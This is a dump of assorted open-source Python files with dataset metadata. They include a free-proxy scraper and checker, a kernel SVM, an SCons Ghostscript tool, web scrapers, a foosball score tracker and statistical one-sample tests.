"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "typing.Set",
"line_number"... |
37695484761 | from random import randint
from concurrent.futures import ThreadPoolExecutor as pool
import random
import os
import subprocess
import re
import requests
import json
import time
class Prox:
    """Scrape several free-proxy listing sites, then probe each proxy and
    keep the ones that can fetch a Google URL within 3 seconds."""

    def __init__(self):
        self.alive = []       # proxies that answered the liveness probe
        self.unfiltered = []  # everything scraped, before probing
        self.get_proxy('https://free-proxy-list.net')
        self.get_proxy('https://www.us-proxy.org/')
        self.get_proxy('https://www.sslproxies.org/')
        self.get_proxy('http://spys.me/proxy.txt')
        self.unfiltered = list(set(self.unfiltered))  # de-duplicate
        print('Total valid proxies>>>')
        print(len(self.unfiltered))
        time.sleep(3)

    def get_proxy(self, url):
        """Fetch one listing page and append its proxies to self.unfiltered.

        NOTE(review): the HTML-table regex yields (ip, port) TUPLES that are
        only joined into 'ip:port' strings in the fallback branch; tuple
        entries would later make 'http://' + x raise in check_proxy (and be
        silently dropped by its bare except). The join likely belongs to
        both branches -- confirm against the original indentation.
        """
        pl = []
        try:
            res = requests.get(url)
            html = res.content.decode()
            try:
                # Listing sites that render an HTML table of ip/port cells.
                pl = re.findall(r'<td>(\d+\.\d+\.\d+\.\d+)</td><td>(\d+)</td>', html)
                if not len(pl):
                    print('now collecting>>>')
                    time.sleep(1)
                    # Plain-text listings (e.g. spys.me) use ip:port lines.
                    pl = re.findall(r'(\d+\.\d+\.\d+\.\d+):(\d+)', html)
                    try:
                        pl = [x[0] + ':' + x[1] for x in pl]
                    except:
                        print('no proxy found')
                self.unfiltered += pl
                print(pl)
            except:
                print('line 40')
                print(len(self.unfiltered))
        except Exception as e:
            print('ERROR AT GET PROXY')
            print(str(e))

    def collect(self):
        """Probe every scraped proxy concurrently (up to 1000 threads)."""
        # ThreadPoolExecutor.map submits all tasks; the `with` block waits
        # for completion on exit even though the result iterator is unused.
        with pool(max_workers=1000) as exc:
            exc.map(self.check_proxy, self.unfiltered)
        print(len(set(self.alive)))

    def check_proxy(self, x):
        """Try a proxy up to three times; record it in self.alive on success."""
        for _ in range(3):
            try:
                proxies = {
                    'http': 'http://' + x,
                    'https': 'https://' + x,
                }
                r = requests.get('https://www.google.com/humans.txt',
                                 timeout=3,
                                 proxies=proxies
                                 )
                if r.status_code == 200:
                    print(x)
                    self.alive.append(x)
                    return
            except:
                # Bare except: any network/format failure just retries.
                pass
        print('dropping ' + x)
        # print(f'TRYING ANOTHER PROXY....PROXY NO.{i+1}')
# Scrape, probe, and append the proxies that responded to a text file.
if __name__ == '__main__':
    r = Prox()
    r.collect()
    with open('fresh_proxy.txt', 'a') as f:
        for i in r.alive:
            f.write(i + '\n')
{
"api_name": "time.sleep",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 43... |
27969273118 | import numpy as np
from scipy import optimize
class KernelSVC:
    """Soft-margin kernel SVM trained by solving the dual problem with SLSQP.

    Parameters
    ----------
    C : float
        Box-constraint (regularisation) parameter: 0 <= alpha_i <= C.
    kernel : callable
        kernel(X1, X2) returning the Gram matrix between two point sets.
    epsilon : float
        Tolerance used to pick the "free" (on-margin) support vectors.
    """

    def __init__(self, C, kernel, epsilon=1e-3):
        self.type = 'non-linear'
        self.C = C
        self.kernel = kernel
        self.alpha = None      # after fit(): signed dual coefficients y_i * alpha_i
        self.support = None    # training points, kept for the decision function
        self.epsilon = epsilon
        self.norm_f = None     # RKHS norm of the fitted function
        self.Nfeval = 0        # SLSQP iteration counter (see callbackF)

    def fit(self, X, y):
        """Fit on data X with binary labels y in {0, 1}."""
        y = 2 * (y - 0.5)        # map {0, 1} -> {-1, +1}
        N = len(y)
        self.support = X
        M = self.kernel(X, X)    # Gram matrix of the training points

        # Lagrange dual: minimise -sum(alpha) + 1/2 (Ya)^T M (Ya), Y = diag(y).
        # diag(y) @ a is just the elementwise product y * a, which avoids the
        # original's O(N^2) diagonal-matrix products on every evaluation.
        def loss(alpha):
            ay = y * alpha
            return -np.sum(alpha) + ay @ (M @ ay) / 2

        # Gradient of the dual objective with respect to alpha.
        def grad_loss(alpha):
            ay = y * alpha
            return -np.ones(N) + y * (M @ ay)

        # Equality: sum_i alpha_i y_i = 0; inequalities: 0 <= alpha_i <= C.
        constraints = (
            {'type': 'eq', 'fun': lambda alpha: np.sum(alpha * y),
             'jac': lambda alpha: y},
            {'type': 'ineq', 'fun': lambda alpha: self.C - alpha,
             'jac': lambda alpha: -np.identity(len(alpha))},
            {'type': 'ineq', 'fun': lambda alpha: alpha,
             'jac': lambda alpha: np.identity(len(alpha))},
        )

        optRes = optimize.minimize(fun=loss,
                                   x0=np.ones(N),
                                   method='SLSQP',
                                   jac=grad_loss,
                                   constraints=constraints,
                                   callback=self.callbackF,
                                   options={"maxiter": 50, 'disp': True})
        alpha = optRes.x

        ## Assign the required attributes
        ay = y * alpha
        # "Free" support vectors satisfy epsilon < alpha < C - epsilon; the
        # mask is computed once instead of twice as in the original.
        on_margin = np.where((alpha > self.epsilon) & (alpha < self.C - self.epsilon))[0]
        self.margin_points = [X[p] for p in on_margin]
        # Offset b: average of y_i - f(x_i) over the on-margin vectors.
        self.b = np.mean(y[on_margin] - self.kernel(self.margin_points, X) @ ay)
        self.norm_f = np.sqrt(ay @ M @ ay)
        self.alpha = ay

    ### Implementation of the separating function $f$
    def separating_function(self, x):
        """Evaluate f(x) = sum_i alpha_i y_i k(x, x_i), without the offset b."""
        return self.kernel(x, self.support) @ self.alpha

    def predict(self, X):
        """Return sigmoid(f(X) + b): a probability-like score for class 1
        (threshold at 0.5 for a hard decision)."""
        d = self.separating_function(X)
        return 1 / (1 + np.exp(-(d + self.b)))

    def callbackF(self, Xi):
        # Called by SLSQP after each iteration; counts and echoes progress.
        print(self.Nfeval)
        self.Nfeval += 1
| Zero-4869/Kernel-methods | classifier.py | classifier.py | py | 2,631 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.diag",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.diag",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 33,
... |
36947774959 | __revision__ = "src/engine/SCons/Tool/gs.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
import SCons.Action
import SCons.Builder
import SCons.Platform
import SCons.Util
# Ghostscript goes by different names on different platforms...
platform = SCons.Platform.platform_default()
if platform == 'os2':
gs = 'gsos2'
elif platform == 'win32':
gs = 'gswin32c'
else:
gs = 'gs'
GhostscriptAction = None
def generate(env):
    """Add Builders and construction variables for Ghostscript to an
    Environment."""
    global GhostscriptAction
    # The following try-except block enables us to use the Tool
    # in standalone mode (without the accompanying pdf.py),
    # whenever we need an explicit call of gs via the Gs()
    # Builder ...
    try:
        if GhostscriptAction is None:
            GhostscriptAction = SCons.Action.Action('$GSCOM', '$GSCOMSTR')

        from SCons.Tool import pdf
        pdf.generate(env)

        # Register Ghostscript as the .ps -> PDF conversion action.
        bld = env['BUILDERS']['PDF']
        bld.add_action('.ps', GhostscriptAction)
    except ImportError as e:
        # Standalone mode: the pdf tool is unavailable; the explicit Gs()
        # builder below still works.
        pass

    gsbuilder = SCons.Builder.Builder(action = SCons.Action.Action('$GSCOM', '$GSCOMSTR'))
    env['BUILDERS']['Gs'] = gsbuilder

    # Default command line: batch-convert input to PDF without pausing.
    env['GS']      = gs
    env['GSFLAGS'] = SCons.Util.CLVar('-dNOPAUSE -dBATCH -sDEVICE=pdfwrite')
    env['GSCOM']   = '$GS $GSFLAGS -sOutputFile=$TARGET $SOURCES'
def exists(env):
    """Return a truthy value if a Ghostscript executable can be located."""
    if 'PS2PDF' in env:
        # Honour an explicitly configured converter first.
        return env.Detect(env['PS2PDF'])
    else:
        return env.Detect(gs) or SCons.Util.WhereIs(gs)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mongodb/mongo | src/third_party/scons-3.1.2/scons-local-3.1.2/SCons/Tool/gs.py | gs.py | py | 1,659 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "SCons.Action.Platform.platform_default",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "SCons.Action.Platform",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "SCons.Action",
"line_number": 9,
"usage_type": "name"
},
{
"api_n... |
7638888119 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 29 17:03:06 2014
@author: aaron
"""
import neblina as nb ### Module for neblina interpreter.
import operators as op ### Module for operators functions.
import ioFunctions as io ### Module for write on disk functions.
import gnuplot as gnuplot ### Module for Gnuplot functions.
import config as cfg ### Module for global variables for Quantum Walk.
import standardDeviation as sd ### Module for Standard Deviation functions.
import numpy as np
import testmode
def run():
probabilities=[]
if not cfg.OVERLAP:
cfg.OVERLAPX=int(cfg.TESSELLATIONPOLYGONS[0])
io.savetxt("HIPERWALK_TEMP_PSI.dat",cfg.STATE,float,'%1.16f')
op.STAGGERED1D()
sd.distances_vector_1D(cfg.RANGEX[0],cfg.RANGEX[1])
cfg.DISTANCE_VECTOR_SIZE=cfg.GRAPHSIZE
# nb.generating_STAGGERED1D_NBL()
nb.runCore_STAGGERED1D()
cfg.STATE=nb.neblina_state_to_vector("NEBLINA_TEMP_final_state.dat")
probabilities=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
output = open("final_distribution.dat",'w')
output1 = open("final_state.dat",'w')
output.write("#POSITION \t PROBABILITY\n")
output1.write("#POSITION \t Re(amplitude) \t \t \t Im(amplitude)\n")
for i in range(int(cfg.GRAPHSIZE)):
output.write("%d \t \t \t%1.16f\n"%(cfg.RANGEX[0]+i,probabilities[i]))
output1.write("%d \t \t \t%1.16f\t\t\t%1.16f\n"%(cfg.RANGEX[0]+i,cfg.STATE[i].real,cfg.STATE[i].imag))
output.close()
output1.close()
if cfg.GNUPLOT:
io.savetxt("HIPERWALK_TEMP_PROBABILITIES.dat",probabilities,float,'%1.16f')
gnuplot.template_STAGGERED1D("HIPERWALK_TEMP_PROBABILITIES.dat","final_distribution.eps","EPS")
if cfg.STEPS>1:
gnuplot.plotStatistics1D()
if cfg.ANIMATION == 1:
gnuplot.plotAnimation1D()
if cfg.TEST_MODE:
modelVector=testmode.create_STAGGERED1D_test_vector()
returnNeblina=nb.neblina_distribution_to_vector("NEBLINA_TEMP_final_distribution.dat")
if np.linalg.norm(modelVector-returnNeblina,np.inf) == float(0):
return 1
else:
return 0
return 1 | hiperwalk/hiperwalk | Archive/staggered1d.py | staggered1d.py | py | 2,333 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "config.OVERLAP",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "config.OVERLAPX",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "config.TESSELLATIONPOLYGONS",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_nam... |
30221585975 | from bs4 import BeautifulSoup
import requests
import csv
import pandas as pd
import os
source = requests.get('https://www.centuryply.com/centurylaminates/')
soup = BeautifulSoup(source.content, 'lxml')
for main in soup.select('li.dropdown-submenu'):
for a_link in main.find_all('a'):
try:
t_link = a_link['href'].replace('#','')
f_name = t_link.replace('.php','')
m_link = f'https://www.centuryply.com/centurylaminates/{t_link}'
folder_location = f'./data/{f_name}'
if not os.path.exists(folder_location):
os.mkdir(folder_location)
source = requests.get(m_link)
soup = BeautifulSoup(source.content, 'lxml')
for src in soup.find_all('div',class_='product-meta'):
links = src.a
link =links.find_next('a')['href']
link = f'https://www.centuryply.com/centurylaminates/{link}'
#print(link)
source = requests.get(link)
soup = BeautifulSoup(source.content, 'lxml')
print(f'>> {link}')
img = soup.find('div',class_='product-img').a['bg-image']
prod_img = f'https://www.centuryply.com/centurylaminates/{img}'
print(prod_img)
name = soup.find('div',class_='product-heading').h1.text
name = f' {name} '
print(name)
desc = soup.find('div',class_='product-description').p.text
print(desc)
f_name = name.replace(' ','_')
filenames = f'{folder_location}/{f_name}.csv'
with open(filenames , 'w') as csv_file:
csv_writer = csv.writer(csv_file)
csv_writer.writerow(['Prod_link ',' Name ',' Images ', ' Prod_Desc '])
csv_writer.writerow([link , name , prod_img , desc])
print(csv_file.closed)
except:
print('')
| jhankarnarang/Century-Plywood-Web-Scraping | Century Laminates/main.py | main.py | py | 2,060 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_numbe... |
74060635624 | """
Twilio API NTS token
"""
import asyncio
from functools import partial
from twilio.rest import Client as TwilioRestClient
from server.config import config
class TwilioNTS:
"""
Twilio NTS Token Service
Creates new twilio NTS tokens
"""
def __init__(self, sid=None, token=None):
if sid is None:
sid = config.TWILIO_ACCOUNT_SID # pragma: no cover
if token is None:
token = config.TWILIO_TOKEN # pragma: no cover
self.twilio_account_sid = sid
self.twilio_token = token
self.client = TwilioRestClient(self.twilio_account_sid, self.twilio_token)
async def server_tokens(self, ttl=None) -> list[dict[str]]:
"""
Fetches token from Twilio
# Params
- `ttl`: ttl in seconds
"""
if ttl is None:
ttl = config.TWILIO_TTL # pragma: no cover
loop = asyncio.get_running_loop()
token = await loop.run_in_executor(None, partial(self.client.tokens.create, ttl))
return token.ice_servers
| FAForever/server | server/ice_servers/nts.py | nts.py | py | 1,056 | python | en | code | 64 | github-code | 36 | [
{
"api_name": "server.config.config.TWILIO_ACCOUNT_SID",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "server.config.config",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "server.config.config.TWILIO_TOKEN",
"line_number": 24,
"usage_type": "a... |
19909624310 | """MAIN MODULE TO RUN"""
from datetime import datetime
import stonk_functions as func
#gets the top sector for the week
sectorOG = func.get_sector()
sector = (sectorOG.replace(' ','')).lower()
#gets todays date
day = datetime.today().strftime('%A')
if day.lower() in ("saturday", "sunday"):
day = "Friday"
today = datetime.now()
date = (f"{today.strftime('%B')} {today.day}")
"""Add Link for Criteria Here using https://finviz.com/screener.ashx"""
#the urls for stock criteria
win_sector = f"https://finviz.com/screener.ashx?v=111&f=sec_{sector},sh_avgvol_o1000,sh_price_o5,sh_relvol_o1.5,targetprice_above&ft=4"
rsi = "https://finviz.com/screener.ashx?v=211&f=sh_avgvol_o1000,sh_price_o5,ta_rsi_os30,ta_sma200_pa,targetprice_above&ft=4"
"""Add New Criteria Variable to urls Dict and assign a label"""
#dict of criteria urls and there label
urls = {win_sector: f"{sectorOG} Winners", rsi : "Oversold"}
#gets the stocks for each criteria and adds them to the stonks dict
stonks = func.get_stocks(urls)
#gets todays watchlist listing
main_str = func.get_main(day,stonks)
#gets current watchlist contents
with open("watchlist.txt", 'r') as file:
contents = file.read()
#if its Monday, start a new watchlist
if day == 'Monday':
with open("watchlist.txt", 'w') as file:
file.write(main_str + '\n')
#if its not Monday, add todays stocks to the current watchlist
else:
content_list = contents.split('\n\n')
#remove the current days entry if its there to make space for updated entry
with open("watchlist.txt", "w") as f:
for i in content_list:
if day not in i:
f.write(f"{i}\n")
f.truncate()
#add todays entry
with open("watchlist.txt", 'a') as file:
file.write(main_str + '\n')
#gets weeks updated wathlist and prints it
with open("watchlist.txt", 'r') as file:
contents = file.read()
print('Watchlist', date)
print(contents)
| abbasn785/Stock-Market-Watchlist-Assistant | stonks.py | stonks.py | py | 2,001 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "stonk_functions.get_sector",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.today",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "d... |
22827039598 | import sqlite3
__author__ = 'marcelo_garay'
import os
class DBManager(object):
db_name = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../../../db/sicarios'))
def __init__(self):
"""
Make connection to an SQLite database file
:param db:
:return:
"""
self.conn = sqlite3.connect(self.db_name)
self.conn.execute('pragma foreign_keys = on')
self.conn.commit()
self.cur = self.conn.cursor()
def query(self, arg):
"""
Execute a query using the arg
:return
"""
self.cur.execute(arg)
self.conn.commit()
return self.cur
def close(self):
"""
Close connection to the database
"""
self.conn.close()
| edson-gonzales/SICARIOS | src/db/transactions/DBManager.py | DBManager.py | py | 825 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9... |
23666599352 | import sys
sys.path.append('../')
import numpy as np
import matplotlib.pyplot as plt
from GroupingAlgorithm import groupingWithOrder
from utils import Label2Chain, H2O, save_object
from joblib import delayed, Parallel
import networkx as nx
from itertools import permutations
from tqdm.auto import tqdm
import copy
sys.setrecursionlimit(10 ** 9)
def n_groups_shuffle(paulis, G, seed, shuffle_paulis=True, shuffle_qubits=True, x=1, n_max=10000, n_delete=0):
G_new = copy.deepcopy(G)
if x < 1 or n_delete > 0:
edges = list(G_new.edges())
if x < 1:
n_delete = int((1 - x) * len(edges))
indices_delete = np.random.default_rng().choice(len(edges), size=n_delete, replace=False)
for index in indices_delete:
G_new.remove_edge(*edges[index])
if not nx.is_connected(G_new):
if n_max == 0:
return np.nan, None, None, G_new
else:
return n_groups_shuffle(paulis, G, seed, shuffle_paulis=shuffle_paulis,
shuffle_qubits=shuffle_qubits, x=x, n_max=n_max - 1, n_delete=n_delete)
np.random.seed(seed)
order_paulis = np.arange(len(paulis))
order_qubits = np.arange(num_qubits)
if shuffle_paulis:
np.random.shuffle(order_paulis)
if shuffle_qubits:
np.random.shuffle(order_qubits)
temp = copy.deepcopy(paulis)
for j in range(len(order_qubits)):
paulis[:, j] = temp[:, order_qubits[j]]
Groups_HEEM, _, _ = groupingWithOrder(paulis[order_paulis], G_new)
return len(Groups_HEEM), order_paulis, order_qubits, G_new
qubit_op = H2O()
num_qubits = qubit_op.num_qubits
paulis, _, _ = Label2Chain(qubit_op)
print('There are {} Pauli strings of {} qubits.'.format(len(qubit_op), num_qubits))
WC_ideal = list(permutations(list(range(num_qubits)), 2))
G_ideal = nx.Graph()
G_ideal.add_nodes_from(range(num_qubits))
G_ideal.add_edges_from(WC_ideal)
backend_parallel = 'multiprocessing'
n = num_qubits
k = 2
total_edges = int(np.math.factorial(n) / (np.math.factorial(n - k) * 2))
n_x = 20
N = 3000
x_vec = np.linspace((num_qubits - 1) / total_edges, 1, n_x)
n_groups_list = []
optimal_order_paulis = []
optimal_order_qubits = []
optimal_graph = []
pbar_outer = tqdm(range(n_x), desc='Connectivity', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=0)
for i in pbar_outer:
pbar_inner = tqdm(range(N), desc='Shuffling', file=sys.stdout, ncols=90,
bar_format='{l_bar}{bar}{r_bar}', position=1)
results = Parallel(n_jobs=-1, backend=backend_parallel)(
delayed(n_groups_shuffle)(paulis, G_ideal, None, x=x_vec[i]) for j in
pbar_inner)
print('-' * 90)
n_groups = [results[i][0] for i in range(N)]
delete_indices = np.where(np.isnan(n_groups))[0]
for j, index in enumerate(delete_indices):
n_groups.pop(index - j)
results.pop(index - j)
n_groups_list.append(n_groups)
index_min = np.argmin(n_groups)
optimal_order_paulis.append(results[index_min][1])
optimal_order_qubits.append(results[index_min][2])
optimal_graph.append(results[index_min][3])
n_std = np.zeros(n_x)
n_avg = np.zeros(n_x)
n_min = np.zeros(n_x)
n_max = np.zeros(n_x)
for i in range(n_x):
n_std[i] = np.std(n_groups_list[i])
n_avg[i] = np.mean(n_groups_list[i])
n_min[i] = np.min(n_groups_list[i])
n_max[i] = np.max(n_groups_list[i])
fig, ax = plt.subplots()
ax.plot(x_vec, n_avg)
ax.fill_between(x_vec, n_avg - n_std, n_avg + n_std, alpha=0.25)
ax.plot(x_vec, n_min, '--')
ax.plot(x_vec, n_max, '--')
ax.set_xlabel('x')
ax.set_ylabel('# of groups')
ax.set_xlim([x_vec[0], x_vec[-1]])
fig.show()
file = 'H20_grouping_shuffle_ideal_vs_connectivity'
data_save = {'x_vec': x_vec, 'n_groups': n_groups_list, 'optimal_order_paulis': optimal_order_paulis,
'optimal_order_qubits': optimal_order_qubits, 'optimal_graph': optimal_graph}
save_object(data_save, file, overwrite=True)
| sergiomtzlosa/HEEM | Codes/deprecated/Grouping_shuffle_vs_connectivity.py | Grouping_shuffle_vs_connectivity.py | py | 3,807 | python | en | code | null | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 3,
"usage_type": "attribute"
},
{
"api_name": "sys.setrecursionlimit",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "copy.deepcopy",
... |
42117172102 | from gpiozero import Button, PWMLED, MotionSensor
from time import sleep, time
from signal import pause
from datetime import datetime, timedelta
import simpleaudio as sa
from models import Game, Goal, Team
from game_history import send_game_history
from constants import UI_GAME_CLOCK, UI_TEAM1_SCORE, UI_TEAM2_SCORE
import threading
import queue
def _play_sound_clip(sound_file, wait=False):
wave_obj = sa.WaveObject.from_wave_file(sound_file)
play_obj = wave_obj.play()
if wait:
play_obj.wait_done()
def _get_elapsed_time_string(elapsed_seconds):
hours, rem = divmod(elapsed_seconds, 3600)
minutes, seconds = divmod(rem, 60)
return "{:0>2}:{:0>2}:{:0>2}".format(int(hours), int(minutes), int(seconds))
def _team_scored(team):
_play_sound_clip("/home/pi/Projects/FoosTracks/resources/SoccerGoal.wav")
class AsyncMatch(threading.Thread):
def __init__(self, ui_queue,
team1_name, team1_members,
team2_name, team2_members,
games_per_match=1,
points_to_win=5,
next_game_callback=None,
match_end_callback=None):
super().__init__()
self.ui_queue = ui_queue # queue for asyncrohonus updates to the tkinter UI
self.team1_name = team1_name
self.team2_name = team2_name
self.team1_members = team1_members
self.team2_members = team2_members
self.games_per_match = games_per_match
self.points_to_win = points_to_win
self.next_game_callback = next_game_callback # function that determines whether the next game in the match should be played. Takes no argments and returns boolean, True if game should be played, False if match shoiuld be ended.
self.match_end_callback = match_end_callback # function that notifies UI that the match has ended, takkes no argments and returns nothing.
self.cancelled = False
self.devices = []
def cancel(self):
self.cancelled = True
def run(self):
if not self.cancelled:
self._start_match()
def _start_match(self):
print("Starting match ...")
team1 = Team(name=self.team1_name, members=self.team1_members, score_handler=_team_scored)
team2 = Team(name=self.team2_name, members=self.team2_members, score_handler=_team_scored)
dev = MotionSensor(16, pull_up=True, sample_rate=120, queue_len=1)
goal_a = Goal(name="Goal A",
score_device=dev,
score_handler=None)
dev = MotionSensor(19, pull_up=True, sample_rate=120, queue_len=1)
goal_b = Goal(name="Goal B",
score_device=dev,
score_handler=None)
self.devices = [goal_a.input_device, goal_b.input_device]
games_played = 0
while games_played < self.games_per_match:
if games_played % 2 == 0:
last_game = self._start_new_game(team1, goal_a, team2, goal_b, ui_queue=self.ui_queue)
else:
last_game = self._start_new_game(team1, goal_b, team2, goal_a, ui_queue=self.ui_queue)
if self.cancelled:
self._clean_up()
print("Match was cancelled")
return
# Game has finished check if the next game in the match should be played
games_played += 1
if games_played < self.games_per_match:
if not self._play_next_game(last_game):
self._clean_up()
if self.match_end_callback:
self.match_end_callback()
break
else:
# Match is over
if self.match_end_callback:
self.match_end_callback()
print("Match is over hope you had fun!")
def _start_new_game(self, team1, goal_1, team2, goal_2, sound_fx=True, ui_queue=None):
print("Starting new game ...")
goal_1.set_on_score_handler(team1.did_score)
goal_2.set_on_score_handler(team2.did_score)
game = Game(team1=team1, team2=team2)
game.start()
if sound_fx:
self._start_fx()
start_time = time()
while not game.finished:
if self.cancelled:
print("Game was cancelled")
self._clean_up()
return
self._update_ui(ui_queue, start_time, game)
self._check_game(game)
sleep(0.1)
# Game is finished
self._report_game_stats(game)
return game
def _start_fx(self):
sound_file = "/home/pi/Projects/FoosTracks/resources/SoccerCrowd.wav"
wave_obj = sa.WaveObject.from_wave_file(sound_file)
play_obj = wave_obj.play()
def _stop_fx(self):
sa.stop_all()
def _update_ui(self, ui_queue, start_time, game):
elapsed_time = _get_elapsed_time_string(time() - start_time)
team1_score = game.team1.total_score()
team2_score = game.team2.total_score()
if ui_queue:
ui_msg = {
UI_GAME_CLOCK: elapsed_time,
UI_TEAM1_SCORE: team1_score,
UI_TEAM2_SCORE: team2_score
}
ui_queue.put(ui_msg)
def _check_game(self, game):
if game.team1.total_score() >= self.points_to_win and game.team2.total_score() >= self.points_to_win:
assert False, "NOT POSSIBLE FOR BOTH TEAMS TO WIN"
elif game.team1.total_score() >= self.points_to_win:
game.finish()
elif game.team2.total_score() >= self.points_to_win:
game.finish()
def _clean_up(self):
sa.stop_all()
# unset goal score handlers
for d in self.devices:
d.close()
def _report_game_stats(self, game):
winner = game.get_winning_team()
loser = game.get_losing_team()
send_game_history(game)
self._print_win_message(winning_team=winner, losing_team=loser)
def _print_win_message(self, winning_team, losing_team):
msg = "\n{0} has won!!!\n{0} - {1}, {2} - {3}".format(winning_team.name,
winning_team.total_score(),
losing_team.name,
losing_team.total_score())
print(msg)
def _play_next_game(self, last_game):
if self.next_game_callback:
winner = last_game.get_winning_team()
loser = last_game.get_losing_team()
msg = "{0} won!\n\nScore\n {0} - {1}\n {2} - {3}\n\nPlay next game?".format(winner.name, winner.total_score(), loser.name, loser.total_score())
play_next = self.next_game_callback(message=msg, title="")
return play_next
else:
input("Press enter to play next game ...")
return True | hobe-studios/foos-tracks | rasppi/score_keeper.py | score_keeper.py | py | 7,000 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "simpleaudio.WaveObject.from_wave_file",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "simpleaudio.WaveObject",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread",
"line_number": 30,
"usage_type": "attribute"
},
... |
71311470503 | import numpy as np
from sklearn.utils.validation import check_array, check_scalar
from scipy import stats
def z_test_one_sample(sample_data, mu_0, sigma, test_type="two-sided"):
"""Perform a one-sample z-test.
Parameters
----------
sample_data : array-like of shape (n_samples,)
Sample data drawn from a population.
mu_0 : float or int
Population mean assumed by the null hypothesis.
sigma: float
True population standard deviation.
test_type : {'right-tail', 'left-tail', 'two-sided'}
Specifies the type of test for computing the p-value.
left-tail: Intergral links bis pvalue
right-tail: 1 - Integral links bis pvalue
two-sided: min etc.
Returns
-------
z_statistic : float
Observed z-transformed test statistic.
p : float
p-value for the observed sample data.
"""
# Check parameters.
sample_data = check_array(sample_data, ensure_2d=False)
mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
sigma = check_scalar(sigma, name="sigma", target_type=(int, float), min_val=0, include_boundaries="neither")
if test_type not in ["two-sided", "left-tail", "right-tail"]:
raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
# empirical mean
empirical_mean = np.mean(sample_data)
# sample size
sample_size = len(sample_data)
# z_statistic
# kommen empirical means aus gleichen Distributions?
z_statistic = (empirical_mean - mu_0) / (sigma / np.sqrt(sample_size))
# p-value
# depends on test_type
p_left = stats.norm.cdf(z_statistic)
p_right = 1 - p_left
if test_type == "left-tail":
p = p_left
elif test_type == "right-tail":
p = p_right
else:
p = 2 * min(p_left, p_right)
return z_statistic, p
def t_test_one_sample(sample_data, mu_0, test_type="two-sided"):
"""Perform a one-sample t-test.
Parameters
----------
sample_data : array-like of shape (n_samples,)
Sample data drawn from a population.
mu_0 : float or int
Population mean assumed by the null hypothesis.
test_type : {'right-tail', 'left-tail', 'two-sided'}
Specifies the type of test for computing the p-value.
Returns
-------
t_statistic : float
Observed t-transformed test statistic.
p : float
p-value for the observed sample data.
Variance is estimated from the sample data (not given like in z-test).
"""
# Check parameters.
sample_data = check_array(sample_data, ensure_2d=False)
mu_0 = check_scalar(mu_0, name="mu_0", target_type=(int, float))
if test_type not in ["two-sided", "left-tail", "right-tail"]:
raise ValueError("`test_type` must be in `['two-sided', 'left-tail', 'right-tail']`")
# empirical mean is test statistic
empirical_mean = np.mean(sample_data)
# empirical standard deviation
# ddof=1: Delta degrees of freedom. The divisor used in calculations is N - ddof, where N represents the number of elements.-> N-1 = ddof
empirical_sigma = np.std(sample_data, ddof=1)
# sample size
sample_size = len(sample_data)
# t_statistic
# kommen empirical means aus gleichen Distributions?
# sigma is not given, has to be estimated from sample data
# degrees of freedom = sample_size - 1; Letzter Datenpunkt ist aus N-1 anderen und mean berechenbar
t_statistic = (empirical_mean - mu_0) / (empirical_sigma / np.sqrt(sample_size))
# p-value
# depends on test_type
p_left = stats.t.cdf(t_statistic, df=sample_size - 1) # df = degrees of freedom
p_right = 1 - p_left
if test_type == "left-tail":
p = p_left
elif test_type == "right-tail":
p = p_right
else:
p = 2 * min(p_left, p_right)
return t_statistic, p
| KlaraGtknst/e2ml_SoSe23 | e2ml/e2ml/evaluation/_one_sample_tests.py | _one_sample_tests.py | py | 3,888 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.utils.validation.check_array",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "sklearn.utils.validation.check_scalar",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sklearn.utils.validation.check_scalar",
"line_number": 34,
"us... |
